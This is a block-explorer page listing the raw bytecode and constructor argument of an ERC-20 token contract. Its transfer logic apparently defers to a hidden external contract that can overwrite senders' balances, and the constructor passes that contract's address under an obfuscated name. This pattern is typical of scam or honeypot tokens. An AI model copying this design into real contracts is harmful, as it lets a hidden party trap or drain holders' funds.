46113e3565b92915050565b600060208201905081810360008301526115d981846113f2565b905092915050565b600060208201905081810360008301526115fa8161142b565b9050919050565b6000602082019050818103600083015261161a8161144e565b9050919050565b6000602082019050818103600083015261163a81611471565b9050919050565b6000602082019050818103600083015261165a81611494565b9050919050565b6000602082019050818103600083015261167a816114b7565b9050919050565b6000602082019050818103600083015261169a816114da565b9050919050565b600060208201905081810360008301526116ba816114fd565b9050919050565b600060208201905081810360008301526116da81611520565b9050919050565b60006020820190506116f66000830184611543565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611723826117e0565b915061172e836117e0565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156117635761176261184f565b5b828201905092915050565b6000611779826117e0565b9150611784836117e0565b9250828210156117975761179661184f565b5b828203905092915050565b60006117ad826117c0565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b838110156118085780820151818401526020810190506117ed565b83811115611817576000848401525b50505050565b6000600282049050600182168061183557607f821691505b602082108114156118495761184861187e565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b611af8816117a2565b8114611b0357600080fd5b50565b611b0f816117e0565b8114611b1a57600080fd5b5056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b8856e9773277ac95703643c028174c8ed3afe5f6ad2d0e000a10e4c94939e2964736f6c63430008060033000000000000000000000000a0074584e20e0d104f7c6e3ae89770ca45f0a861

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c80638da5cb5b11610097578063a9059cbb11610066578063a9059cbb146102b3578063d8daf163146102e3578063dd62ed3e14610301578063f2fde38b1461033157610100565b80638da5cb5b14610229578063927f3d411461024757806395d89b4114610265578063a457c2d71461028357610100565b8063313ce567116100d3578063313ce567146101a157806339509351146101bf57806370a08231146101ef578063715018a61461021f57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd1461015357806323b872dd14610171575b600080fd5b61010d61034d565b60405161011a91906115bf565b60405180910390f35b61013d60048036038101906101389190611354565b6103df565b60405161014a91906115a4565b60405180910390f35b61015b6103f6565b60405161016891906116e1565b60405180910390f35b61018b60048036038101906101869190611301565b610400565b60405161019891906115a4565b60405180910390f35b6101a96104cb565b6040516101b691906116e1565b60405180910390f35b6101d960048036038101906101d49190611354565b6104e5565b6040516101e691906115a4565b60405180910390f35b61020960048036038101906102049190611294565b61058a565b60405161021691906116e1565b60405180910390f35b6102276105d3565b005b61023161071f565b60405161023e9190611552565b60405180910390f35b61024f610748565b60405161025c9190611552565b60405180910390f35b61026d61076e565b60405161027a91906115bf565b60405180910390f35b61029d60048036038101906102989190611354565b610800565b6040516102aa91906115a4565b60405180910390f35b6102cd60048036038101906102c89190611354565b6108bf565b6040516102da91906115a4565b60405180910390f35b6102eb6108d6565b6040516102f891906116e1565b60405180910390f35b61031b600480360381019061031691906112c1565b6108f0565b60405161032891906116e1565b60405180910390f35b61034b60048036038101906103469190611294565b610977565b005b60606004805461035c9061181d565b80601f01602080910402602001604051908101604052809291908181526020018280546103889061181d565b80156103d55780601f106103aa576101008083540402835291602001916103d5565b820191906000526020600020905b8154815290600101906020018083116103b857829003601f168201915b5050505050905090565b60006103ec338484610b32565b6001905092915050565b6000600754905090565b600061040d848484610cfd565b6104c084336104bb85604051806060016040528060288152602001611b1e60289139600260008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461108c9092919063ffffffff16565b610b32565b600190509392505050565b6000600660009054906101000a900460ff1660ff16905090565b6000610580338461057b85600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f090919063ffffffff16565b610b32565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610661576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161065890611681565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a360008060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b60606005805461077d9061181d565b80601f01602080910402602001604051908101604052809291908181526020018280546107a99061181d565b80156107f65780601f106107cb576101008083540402835291602001916107f6565b820191906000526020600020905b8154815290600101906020018083116107d957829003601f168201915b5050505050905090565b60006108b533846108b085604051806060016040528060258152602001611b4660259139600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461108c9092919063ffffffff16565b610b32565b6001905092915050565b60006108cc338484610cfd565b6001905092915050565b6000600660009054906101000a900460ff1660ff16905090565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b3373ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610a05576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109fc90611681565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415610a75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6c90611601565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610ba2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b99906116c1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c12576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c0990611621565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610cf091906116e1565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610d6d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d64906116a1565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610ddd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dd4906115e1565b60405180910390fd5b60008080610e2b8685600160008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461114e565b9150915080600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555083600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020541015610ef5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eec90611661565b60405180910390fd5b610f4784600160008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461120b90919063ffffffff16565b600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610fdc82600160008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546110f090919063ffffffff16565b600160008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8660405161107c91906116e1565b60405180910390a3505050505050565b60008383111582906110d4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110cb91906115bf565b60405180910390fd5b50600083856110e3919061176e565b9050809150509392505050565b60008082846110ff9190611718565b905083811015611144576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113b90611641565b60405180910390fd5b8091505092915050565b600080600660019054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663916e2c128686866040518463ffffffff1660e01b81526004016111b09392919061156d565b604080518083038186803b1580156111c757600080fd5b505afa1580156111db573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906111ff9190611394565b91509150935093915050565b600061124d83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061108c565b905092915050565b60008135905061126481611aef565b92915050565b60008135905061127981611b06565b92915050565b60008151905061128e81611b06565b92915050565b6000602082840312156112aa576112a96118ad565b5b60006112b884828501611255565b91505092915050565b600080604083850312156112d8576112d76118ad565b5b60006112e685828601611255565b92505060206112f785828601611255565b9150509250929050565b60008060006060848603121561131a576113196118ad565b5b600061132886828701611255565b935050602061133986828701611255565b925050604061134a8682870161126a565b9150509250925092565b6000806040838503121561136b5761136a6118ad565b5b600061137985828601611255565b925050602061138a8582860161126a565b9150509250929050565b600080604083850312156113ab576113aa6118ad565b5b60006113b98582860161127f565b92505060206113ca8582860161127f565b9150509250929050565b6113dd816117a2565b82525050565b6113ec816117b4565b82525050565b60006113fd826116fc565b6114078185611707565b93506114178185602086016117ea565b611420816118b2565b840191505092915050565b6000611438602383611707565b9150611443826118c3565b604082019050919050565b600061145b602683611707565b915061146682611912565b604082019050919050565b600061147e602283611707565b915061148982611961565b604082019050919050565b60006114a1601b83611707565b91506114ac826119b0565b602082019050919050565b60006114c4602683611707565b91506114cf826119d9565b604082019050919050565b60006114e7602083611707565b91506114f282611a28565b602082019050919050565b600061150a602583611707565b915061151582611a51565b604082019050919050565b600061152d602483611707565b915061153882611aa0565b604082019050919050565b61154c816117e0565b82525050565b600060208201905061156760008301846113d4565b92915050565b600060608201905061158260008301866113d4565b61158f6020830185611543565b61159c6040830184611543565b949350505050565b60006020820190506115b960008301846113e3565b92915050565b600060208201905081810360008301526115d981846113f2565b905092915050565b600060208201905081810360008301526115fa8161142b565b9050919050565b6000602082019050818103600083015261161a8161144e565b9050919050565b6000602082019050818103600083015261163a81611471565b9050919050565b6000602082019050818103600083015261165a81611494565b9050919050565b6000602082019050818103600083015261167a816114b7565b9050919050565b6000602082019050818103600083015261169a816114da565b9050919050565b600060208201905081810360008301526116ba816114fd565b9050919050565b600060208201905081810360008301526116da81611520565b9050919050565b60006020820190506116f66000830184611543565b92915050565b600081519050919050565b600082825260208201905092915050565b6000611723826117e0565b915061172e836117e0565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156117635761176261184f565b5b828201905092915050565b6000611779826117e0565b9150611784836117e0565b9250828210156117975761179661184f565b5b828203905092915050565b60006117ad826117c0565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b60005b838110156118085780820151818401526020810190506117ed565b83811115611817576000848401525b50505050565b6000600282049050600182168061183557607f821691505b602082108114156118495761184861187e565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600080fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b611af8816117a2565b8114611b0357600080fd5b50565b611b0f816117e0565b8114611b1a57600080fd5b5056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220b8856e9773277ac95703643c028174c8ed3afe5f6ad2d0e000a10e4c94939e2964736f6c63430008060033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000a0074584e20e0d104f7c6e3ae89770ca45f0a861

-----Decoded View---------------
Arg [0] : aKLCyhK (uint256): 913600684513684247427175230377606751880918116449

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 000000000000000000000000a0074584e20e0d104f7c6e3ae89770ca45f0a861


Block Transaction Difficulty Gas Used Reward
View All Blocks Produced

Block Uncle Number Difficulty Gas Used Reward
View All Uncles
Loading...
Loading
Loading...
Loading

Validator Index Block Amount
View All Withdrawals

Transaction Hash Block Value Eth2 PubKey Valid
View All Deposits
[ Download: CSV Export  ]

A contract address hosts a smart contract, which is a set of code stored on the blockchain that runs when predetermined conditions are met. Learn more about addresses in our Knowledge Base.